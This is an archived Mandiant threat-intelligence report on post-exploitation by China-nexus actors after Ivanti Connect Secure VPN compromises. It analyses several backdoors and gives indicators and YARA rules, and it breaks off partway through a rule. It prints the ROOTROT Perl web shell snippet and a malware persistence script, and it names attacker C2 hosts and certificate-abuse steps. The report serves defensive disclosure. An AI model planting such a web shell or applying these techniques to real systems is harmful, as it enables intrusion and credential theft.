{
	"id": "eb0a2f7f-e3b3-48f0-a3d7-b999b45aa75e",
	"created_at": "2026-04-06T00:14:13.886912Z",
	"updated_at": "2026-04-10T03:34:44.460076Z",
	"deleted_at": null,
	"sha1_hash": "b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b",
	"title": "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 528875,
	"plain_text": "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies\r\nBy Mandiant\r\nPublished: 2024-04-04 · Archived: 2026-04-05 15:16:44 UTC\r\nWritten by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph\r\nPisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan\r\nSince the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted\r\nmultiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's\r\nprevious blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence\r\nAttempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus\r\nespionage actor that Mandiant tracks as UNC5325. \r\nThis blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types\r\nof activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did\r\nnot have the appropriate mitigation applied. \r\nMandiant has observed different types of post-exploitation activity across our incident response engagements,\r\nincluding lateral movement supported by the deployment of open-source tooling and custom malware families. In\r\naddition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by\r\nabusing appliance-specific functionality to achieve their objectives.\r\nAs of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by\r\nthe vulnerabilities. We recommend that customers follow Ivanti's latest patching guidance and instructions to\r\nprevent further exploitation activity. 
In addition, Ivanti released a new enhanced external integrity checker tool\r\n(ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other\r\ntactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening\r\nguide, which includes recommendations.\r\nMandiant recommends customers run both the internal and the latest external ICT released alongside a new patch\r\non April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge\r\nIvanti for their collaboration, transparency, and ongoing support throughout this process.\r\nClustering and Attribution\r\nMandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893\r\nacross our incident response investigations. In addition to suspected China-nexus espionage groups,\r\nMandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887,\r\nlikely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has\r\nobserved eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are\r\nhighlighting five China-nexus clusters that have conducted intrusions. \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 1 of 20\n\nIn February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium\r\nconfidence to be Volt Typhoon, targeting U.S. energy and defense sectors. 
The UNC5291 campaign targeted Citrix\r\nNetscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024; however,\r\nMandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.\r\nUNC5221\r\nUNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805\r\nand CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous\r\nblog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887\r\nfollowing the public disclosure on Jan. 10, 2024.\r\nUNC5266\r\nMandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER\r\nimplant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA.\r\nAt this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that\r\nUNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting\r\nvulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among\r\nothers, to gain initial access to target environments. \r\nUNC5330\r\nUNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893\r\nand CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has\r\nemployed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate\r\nregistry entries, and establish persistence.\r\nMandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to\r\nhelp facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from\r\nSept. 1, 2022 through Jan. 1, 2024. 
UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this\r\nserver on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in\r\nconjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330\r\nhas been operating through this server since at least 2021. \r\nUNC5337\r\nUNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances\r\nas early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887\r\n(command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom\r\nmalware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer,\r\nand SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is\r\nUNC5221. \r\nUNC5291\r\nUNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with\r\nUNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on\r\nCitrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in\r\nmid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns\r\nwith past Volt Typhoon interest in critical infrastructure. In Feb. 
2024, the Cybersecurity and Infrastructure\r\nSecurity Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and\r\nwas potentially interested in Ivanti Connect Secure devices for initial access.\r\nNew TTPs and Malware\r\nSince our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain\r\naccess to target environments and move laterally within them. Additionally, Mandiant has identified several new\r\ncode families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these\r\ncode families, several are assessed to be custom malware families; however, Mandiant has also identified the use\r\nof open-source tooling, such as SLIVER and CrackMapExec.\r\nSPAWN Malware Family\r\nDuring analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four\r\ndistinct malware families that work closely together to create a stealthy and persistent backdoor on an infected\r\nappliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid\r\ndetection. \r\nFigure 1 illustrates how the SPAWN malware family operates.\r\nFigure 1: SPAWN malware family diagram\r\nSPAWNANT\r\nSPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the\r\nSPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and\r\nexports an sprintf function, adding malicious code to it before redirecting the flow back to vsnprintf.\r\nSPAWNMOLE\r\nSPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web\r\nprocess to monitor traffic and filter out malicious traffic originating from the attacker. 
The remainder of the benign\r\ntraffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host\r\nprovided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where\r\nSPAWNSNAIL is operating to access the backdoor.\r\nThe malware attempts to inject itself into a process named web.\r\nThe malware attempts to hijack the accept API from the libc binary within the web process.\r\nThe malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.\r\nThe malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at\r\noffset 0x1b of the received buffer.\r\nSPAWNSNAIL\r\nSPAWNSNAIL (libdsmeeting.so) is a backdoor that listens on localhost. It is designed to run by injecting into\r\nthe dsmdm process (the process responsible for supporting mobile device management features). It creates a\r\nbackdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the\r\nSPAWNMOLE tunneler to interact with SPAWNSNAIL.\r\nSPAWNSNAIL's second purpose is to inject SPAWNSLOTH (.liblogblock.so) into dslogserver, a process\r\nsupporting event logging on Connect Secure.\r\nSPAWNSNAIL checks if its binary name is dsmdm; if it is running under that name, it creates two threads:\r\n1. The first thread drops a hard-coded SSH host private key to /tmp/.dskey, configures libssh to use the key,\r\nand then deletes /tmp/.dskey. The malware binds to localhost on port 8300.\r\n   1. The SSH server requires public key authentication.\r\n   2. When starting an interactive shell session, the malware prints a banner with statistics about the\r\nsystem. It will print information about the release, uptime, current time, and whether SELinux is\r\nenabled. 
SPAWNSNAIL then executes an interactive bash shell.\r\n2. The second thread injects a log tampering utility, SPAWNSLOTH (/tmp/.liblogblock.so), into the\r\ndslogserver process up to three times.\r\nSPAWNSLOTH\r\nSPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and\r\ndisable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.\r\nSPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging\r\nfunction of dslogserver). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a\r\nglobal variable controlling if event logs should be forwarded to an external syslog server.\r\nFinally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL\r\nbackdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.\r\nGetting to the Root of It\r\nDuring the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a\r\nnew web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a\r\nlegitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting\r\nCVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the\r\nappliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218.\r\nFigure 2 shows the code inserted into the setcookie.thtml.ttc file that contains ROOTROT. The web shell can\r\nbe accessed at /dana-na/auth/setcookie.cgi. It Base64-decodes the command issued in the request parameter and\r\nexecutes it with eval. 
\r\n $output .= \"\u003c/body\u003e\\n\\n\u003c/html\u003e\\n\";\r\n $output .= \"\u003c!--\\n\";\r\n my $key = CGI::param('[REDACTED]');\r\n use MIME::Base64;\r\n if(defined($key)){\r\n my $arg=decode_base64(\"$key\");\r\n eval($arg);\r\n }\r\n $output .= \"--\u003e\\n\";\r\n } };\r\n if ($@) {\r\n $error = $context-\u003ecatch($@, \\$output);\r\n die $error unless $error-\u003etype eq 'return';\r\n }\r\n \r\n return $output;\r\n },\r\nFigure 2: Code block inserted into the setcookie.thtml.ttc file\r\nDuring the investigation, Mandiant identified that the web shell was created on the system prior to the public\r\ndisclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the\r\npresence of ROOTROT by the existence of \u003c!--\\n and --\u003e\\n at the end of the response from /dana-na/auth/setcookie.cgi. \r\nAs of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc.\r\nLateral Movement Leading to vCenter Compromise\r\nOnce UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated\r\nnetwork reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant\r\nidentified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. \r\nAfter moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter,\r\nutilizing a naming convention consistent with other servers in the environment. Though the virtual machine\r\ncreation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual\r\nmachine.\r\nFollowing this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM\r\nbackdoor to the appliance (/home/vsphere-ui/vcli). 
Notably, BRICKSTORM appears to masquerade as a\r\nlegitimate vCenter process, vami-http. \r\nBRICKSTORM\r\nBRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a\r\nweb server, perform file system and directory manipulation, perform file operations such as upload/download, run\r\nshell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded\r\nC2.\r\nUpon execution, BRICKSTORM checks for an environment variable, WRITE_LOG, to determine if the file needs\r\nto be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample\r\nfrom /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd. It will then execute the copied\r\nBRICKSTORM sample and terminate execution.\r\nIf WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd, and continues execution.\r\nBRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the\r\nenvironment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file\r\n/home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd. Then, it sets the\r\nappropriate environment variables and spawns the process. The watcher process then begins monitoring the exit\r\nstatus of the child process.\r\nIf it finds the environment variable WORKER is set to true, it assumes it is a spawned worker process meant to\r\nexecute the backdoor functionality and skips the remainder of the Watcher function.\r\nBRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket\r\naddress of wss://opra1.oprawh.workers[.]dev. 
Additionally, it contains the following legitimate DNS over\r\nHTTPS (DoH) addresses.\r\nhttps://9.9.9.9/dns-query\r\nhttps://45.90.28.160/dns-query\r\nhttps://45.90.30.160/dns-query\r\nhttps://149.112.112.112/dns-query\r\nhttps://9.9.9.11/dns-query\r\nhttps://1.1.1.1/dns-query\r\nhttps://1.0.0.1/dns-query\r\nhttps://8.8.8.8/dns-query\r\nhttps://8.8.4.4/dns-query\r\nFigure 3: DNS over HTTPS addresses\r\nBRICKSTORM appears to leverage a custom Go package called wssoft. There is no known, publicly available\r\nGo package with this name. It appears this may be the main package developed by the malware authors to perform\r\ntask processing and connection handling for the malware.\r\nTable 1 provides the four core functions provided by wssoft.\r\nFunction Comments\r\nSpawning a web server See below for accepted routes/endpoints\r\nCommand execution Executes shell commands using /bin/sh\r\nCommand execution (“NoContext”) Executes shell commands using calls to os.Exec; likely accepts the commands run_shell and exit\r\nSOCKS relaying Connection proxying\r\nTable 1: wssoft capabilities\r\nWhen the backdoor functionality is activated, it spawns a web server to handle incoming commands. 
It uses\r\nGorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON.\r\nTable 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.\r\nEndpoint Function\r\n/api/file/change-dir Change directory\r\n/api/file/delete-dir Deletes a directory\r\n/api/file/delete-file Deletes a file\r\n/api/file/mkdir Makes a directory (creates subdirectories as necessary)\r\n/api/file/list-dir Lists directory contents\r\n/api/file/rename Renames a file\r\n/api/file/put-file File upload given a destination path, can optionally append to file\r\n/api/file/get-file File download\r\n/api/file/slice-up May upload large files in separate chunks\r\n/api/file/file-md5 Calculates file MD5\r\n/api/file/up Uploads a file using a web form (includes SHA256 hashing)\r\n/api/file/stat Gets file information\r\nTable 2: BRICKSTORM endpoints\r\nLateral Movement Leading to Active Directory Compromise\r\nUNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887,\r\na tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind\r\naccount configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows\r\nCertificate Template, created a computer object, and requested a certificate for a domain administrator. The threat\r\nactor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential\r\nmaterial to move laterally.\r\nAttack Path Diagram\r\nFigure 4: UNC5330 attack path diagram\r\nWindows Certificate Template Abuse \r\nUNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create\r\na domain computer object, testComputer$. 
UNC5330 used the newly created testComputer$ computer object\r\nto request a certificate from a vulnerable certificate template that provided enrollment rights to Domain\r\nComputers. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using\r\nthe certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral\r\nmovement.\r\nOnce domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the\r\nPHANTOMNET backdoor.\r\nWMI Event Consumers\r\nWMI was used to perform lateral movement and establish persistence within the victim environment, primarily by\r\ncreating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers\r\nperformed the following:\r\n1. Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute a\r\ncommand with cmd.exe.\r\n2. Wrote command output to a .log file in C:\\Windows\\Temp.\r\n3. Deleted the scheduled task.\r\nThe behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with\r\na recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB.\r\nMandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.\r\nTONERJAM\r\nTONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as\r\nan encrypted local file. It decrypts the payload using an AES key derived from a SHA hash of the final 16 bytes of the\r\nencrypted payload. 
TONERJAM maintains persistence via the Run registry key or by hijacking COM objects,\r\ndepending on the permissions granted to it upon execution.\r\nPHANTOMNET\r\nPHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP.\r\nPHANTOMNET's core functionality involves expanding its capabilities through a plugin management system.\r\nThe downloaded plugins are mapped directly into memory and executed.\r\nSLIVER C2\r\nDuring a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on\r\nthe same IP address as the configured command-and-control server. The copies of SLIVER were placed in three\r\nseparate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266\r\nmodified a systemd service file to register one of the copies of SLIVER as a persistent daemon.\r\nPath Description\r\n/home/bin/netmon SLIVER\r\n/home/bin/logd SLIVER\r\n/home/runtime/logd SLIVER\r\n/home/config/logd.spec.cfg systemd service unit configuration file\r\nTable 3: SLIVER components\r\nAdditionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant\r\nwas downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda.\r\nSee Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.\r\nTERRIBLETEA\r\nIn a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation.\r\nHowever, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA.\r\nDuring this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these\r\nattempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an\r\nanonymous file sharing site: pan.xj.hk. 
UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in\r\nthe intervening seven minutes.\r\nTERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It\r\nis built using multiple open-source Go modules and has a multitude of capabilities including:\r\nCommand execution\r\nKeystroke logging\r\nSOCKS5 proxy\r\nPort scanning\r\nFile system interaction\r\nSQL query execution\r\nScreen captures\r\nAbility to open a new SSH session, execute commands, and upload files to a remote server. The following\r\ncommands may be executed:\r\nchmod +x /tmp/.udevd\r\n/tmp/.udevd \u003cargs\u003e\r\nls -lahrt /home/\r\nTERRIBLETEA can take different execution paths depending on what environment it is configured for, either\r\nlinux_amd64 or darwin_amd64. In this instance, TERRIBLETEA is configured for the linux_amd64\r\nenvironment. The sample persists via a Bash profile script located at /etc/profile.d/cron.sh.\r\n# Initialization script for bash and sh\r\n# export AFS if you are in AFS environment\r\na=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`\r\nif [ \"$a\" -eq 0 ]\r\nthen\r\n/bin/cron\r\nfi\r\nFigure 5: TERRIBLETEA Bash profile script\r\nOutlook and Implications\r\nThe activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325\r\ntargeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues\r\nto observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their\r\noperations and target organizations across the globe. \r\nMandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities\r\nagainst edge appliances. 
As previously reported by Mandiant, China-nexus actors continue to evolve their stealth\r\nto avoid detection by defenders. While the use of open-source tooling is somewhat common, Mandiant continues\r\nto observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.\r\nIndicators of Compromise (IOCs)\r\nHost-Based Indicators (HBIs)\r\nFilename MD5 Description\r\ndata.dat 9d684815bc96508b99e6302e253bc292 PHANTOMNET\r\nepdevmgr.dll b210a9a9f3587894e5a0f225b3a6519f TONERJAM\r\nlibdsproxy.so 4f79c70cce4207d0ad57a339a9c7f43c SPAWNMOLE\r\nlibdsmeeting.so e7d24813535f74187db31d4114f607a1 SPAWNSNAIL\r\n.liblogblock.so 4acfc5df7f24c2354384f7449280d9e0 SPAWNSLOTH\r\n.dskey 3ef30bc3a7e4f5251d8c6e1d3825612d SPAWNSNAIL private key\r\nN/A bb3b286f88728060c80ea65993576ef8 TERRIBLETEA\r\nN/A cfca610934b271c26437c4ce891bad00 TERRIBLETEA\r\nN/A 08a817e0ae51a7b4a44bc6717143f9c2 TERRIBLETEA\r\nlinb64.png e7fdbed34f99c05bb5861910ca4cc994 SLIVER\r\nlint64.png c251afe252744116219f885980f2caea SLIVER\r\nlinb64.png 4f68862d3170abd510acd5c500e43548 SLIVER\r\nlint64.png 9d0b6276cbc4c8b63c269e1ddc145008 SLIVER\r\nlogd 71b4368ef2d91d49820c5b91f33179cb SLIVER\r\nwinb64.png d88bbed726d79124535e8f4d7de5592e SLIVER\r\nlogd.spec.cfg 846369b3a3d4536008a6e1b92ed09549 SLIVER persistence\r\nN/A 8e429d919e7585de33ea9d7bb29bc86b SLIVER downloader\r\nN/A fc1a8f73010f401d6e95a42889f99028 PHANTOMNET\r\nN/A e72efc0753e6386fbca0a500836a566e PHANTOMNET\r\nN/A 4645f2f6800bc654d5fa812237896b00 BRICKSTORM\r\nTable 4: Host-based indicators\r\nNetwork-Based Indicators (NBIs)\r\nNetwork Indicator Type Description\r\n8.218.240[.]85 IPv4 Post-exploitation 
activity\r\n98.142.138[.]21 IPv4 Post-exploitation activity\r\n103.13.28[.]40 IPv4 Post-exploitation activity\r\n103.27.110[.]83 IPv4 Post-exploitation activity\r\n103.73.66[.]37 IPv4 Post-exploitation activity\r\n193.149.129[.]191 IPv4 Post-exploitation activity\r\n206.188.196[.]199 IPv4 Post-exploitation activity\r\noast[.]fun Domain Pre-exploitation validation\r\ncpanel.netbar[.]org Domain WARPWIRE Variant C2 server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 14 of 20\n\nNetwork Indicator Type Description\r\npan.xj[.]hk Domain Post-exploitation activity\r\nakapush.us[.]to Domain SLIVER C2 server\r\nopra1.oprawh.workers.dev Domain BRICKSTORM C2 server\r\nTable 5: Network-based indicators\r\nYARA Rules\r\nrule M_Hunting_Webshell_ROOTROT_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects ROOTROT, a web shell written in\r\nPerl that is embedded into a legitimate Pulse Secure .ttc file to\r\nenable arbitrary command execution.\"\r\n md5 = \"c7ffd2c06e9b7e8e0b7ac92a0dbe3294\"\r\n strings:\r\n $s1 = \"use MIME::Base64\" ascii\r\n $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73\r\n65 36 34 28 22 24 6b 65 79 22 29}\r\n $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e\r\n22 3b}\r\n $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e\r\n5c 6e 22}\r\n condition:\r\n filesize \u003c 4KB\r\n and all of them\r\n}\r\nrule M_Hunting_Backdoor_BRICKSTORM_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n created = \"2024-01-30\"\r\n md5 = \"4645f2f6800bc654d5fa812237896b00\"\r\n descr = \"Hunting rule looking for BRICKSTORM golang backdoor samples\"\r\n strings:\r\n $v1 = \"/home/vsphere-ui/vcli\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 15 of 20\n\n$v2 = \"/opt/vmware/sbin\" ascii wide\r\n $v3 = \"/opt/vmware/sbin/vami-httpd\" ascii wide\r\n $s1 = 
\"github.com/gorilla/mux\" ascii wide\r\n $s2 = \"WRITE_LOG=true\" ascii wide\r\n $s3 = \"wssoft\" ascii wide\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and filesize \u003c 6MB and 1 of ($v*) and 2 of ($s*)\r\n}\r\nimport \"pe\"\r\nrule M_APT_Backdoor_Win_PHANTOMNET_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"59f4d38a5caafbc94673c6d488bf37e3\"\r\n strings:\r\n $phantomnet = /\\\\PhantomNet-\\w{1,10}\\.pdb/ ascii nocase\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\nand all of them\r\n}\r\nrule M_APT_Backdoor_SLIVER_1\r\n{\r\n meta:\r\n Author = “Mandiant”\r\n description = \"Detects Windows, MacOS and ELF variants\r\nof the Sliver implant framework\"\r\n md5 = \"5ecd0c38501dfb02b682cec0a2d93aa9\"\r\n strings:\r\n $s1 = \".InvokeSpawnDllReq\"\r\n $s2 = \".(*InvokeSpawnDllReq).Reset\"\r\n $s3 = \".(*InvokeSpawnDllReq).ProtoMessage\"\r\n $s4 = \".(*InvokeSpawnDllReq).ProtoReflect\"\r\n $s5 = \".(*InvokeSpawnDllReq).Descriptor\"\r\n $s6 = \".(*InvokeSpawnDllReq).GetData\"\r\n $s7 = \".(*InvokeSpawnDllReq).GetProcessName\"\r\n $s8 = \".(*InvokeSpawnDllReq).GetArgs\"\r\n $s10 = \".(*InvokeSpawnDllReq).GetKill\"\r\n $s11 = \".(*InvokeSpawnDllReq).GetPPid\"\r\n $s12 = \".(*InvokeSpawnDllReq).GetProcessArgs\"\r\n $s13 = \".(*InvokeSpawnDllReq).GetRequest\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 16 of 20\n\n$s14 = \".(*InvokeSpawnDllReq).String\"\r\n $s15 = \".(*InvokeSpawnDllReq).GetEntryPoint\"\r\n condition:\r\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550)\r\nor uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0)\r\n== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE))\r\nand 5 of ($s*)\r\n}\r\nrule M_APT_Backdoor_TERRIBLETEA_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect on events related\r\nto terribletea. 
TERRIBLETEA is a backdoor written in Go that communicates\r\nover HTTP. Its many capabilities include shell command execution,\r\ncapturing screens, keystroke logging, port scanning, enumerating files,\r\nstarting a SOCKS5 proxy and new SSH session, downloading files, and\r\nexecuting SQL queries.\"\r\n md5 = \"bb3b286f88728060c80ea65993576ef8\"\r\n \r\n strings:\r\n $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E\r\n[1-12] 80 7B ?? 64}\r\n $code_get_task = { 48 8D [5] B9 04 00 00 00 48 8B ?? 24 [4] 48\r\n8D [5] 41 B8 03 00 00 00 E8}\r\n $func1 = \"SendRequest\" fullword\r\n $func2 =\"UploadResult\"\r\n $func3 =\"Online\"\r\n $func4 =\"GetCommond\"\r\n condition:\r\n all of ($code*) and any of ($func*) and filesize\u003c20MB\r\n}\r\nrule M_Launcher_TONERJAM_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects TONERJAM, a launcher that\r\ndecrypts and executes a shellcode payload stored as an encrypted\r\nlocal file and decrypts it using an AES key derived from a SHA hash\r\nof the final 16 bytes of the encrypted payload.\"\r\n strings:\r\n $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 17 of 20\n\n$p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))\r\n )\r\n}\r\nrule M_APT_Installer_SPAWNSNAIL_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNSNAIL. SPAWNSNAIL is an SSH\r\nbackdoor targeting Ivanti devices. 
